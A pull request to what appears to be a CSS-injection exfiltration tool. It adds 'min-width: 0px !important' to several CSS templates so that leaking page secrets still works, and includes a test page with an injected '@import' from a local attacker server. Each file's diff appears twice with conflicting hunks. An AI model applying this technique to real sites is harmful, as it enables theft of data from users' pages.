### PR TITLE
Update CSS to fix blocking issue caused by min-width

### DIFF
--- a/templates/dynamic-anim.css.jinja
+++ b/templates/dynamic-anim.css.jinja
@@ -14,7 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
-    min-width: 0px;
+    min-width: 0px !important;
 }
 
 html {

--- a/templates/dynamic-anim.css.jinja
+++ b/templates/dynamic-anim.css.jinja
@@ -14,6 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
+    min-width: 0px;
 }
 
 html {

--- a/templates/dynamic-sfc.css.jinja
+++ b/templates/dynamic-sfc.css.jinja
@@ -14,7 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
-    min-width: 0px;
+    min-width: 0px !important;
 }
 
 html {

--- a/templates/dynamic-sfc.css.jinja
+++ b/templates/dynamic-sfc.css.jinja
@@ -14,6 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
+    min-width: 0px;
 }
 
 html {

--- a/templates/dynamic.css.jinja
+++ b/templates/dynamic.css.jinja
@@ -15,7 +15,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
-    min-width: 0px;
+    min-width: 0px !important;
 }
 
 html {

--- a/templates/dynamic.css.jinja
+++ b/templates/dynamic.css.jinja
@@ -15,6 +15,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
+    min-width: 0px;
 }
 
 html {

--- a/templates/static-anim.css.jinja
+++ b/templates/static-anim.css.jinja
@@ -14,7 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
-    min-width: 0px;
+    min-width: 0px !important;
 }
 
 html {

--- a/templates/static-anim.css.jinja
+++ b/templates/static-anim.css.jinja
@@ -14,6 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
+    min-width: 0px;
 }
 
 html {

--- a/templates/static.css.jinja
+++ b/templates/static.css.jinja
@@ -14,7 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
-    min-width: 0px;
+    min-width: 0px !important;
 }
 
 html {

--- a/templates/static.css.jinja
+++ b/templates/static.css.jinja
@@ -14,6 +14,7 @@ html, body, head {
     outline: 0!important;
     line-height: 0!important;
     position: relative !important;
+    min-width: 0px;
 }
 
 html {


### PR DESCRIPTION
hi
I came across a case where an external stylesheet loaded via a <style> tag in the <head> added min-width: 320px;. This prevented the content exfiltration. By overriding this with min-width: 0px;, the issue was fixed and the exfiltration now works successfully.

* index.html

```html
<!DOCTYPE html>
<html>
    <head>
    <style>
    body {
      min-width: 320px;
    }
    </style>
    </head>
    <body>
        <script>window.secret = 'The quick brown fox jumps over the lazy dog';</script>
        <style>@import url("http://localhost:4242/");</style>

    </body>
</html>

```

<img width="3051" height="833" alt="image" src="https://github.com/user-attachments/assets/6768f690-525b-4330-a214-2723f96c402d" />


* min-width: 0px;

<img width="3052" height="1338" alt="image" src="https://github.com/user-attachments/assets/919f5025-12a9-475b-809a-bb4be3084dd2" />
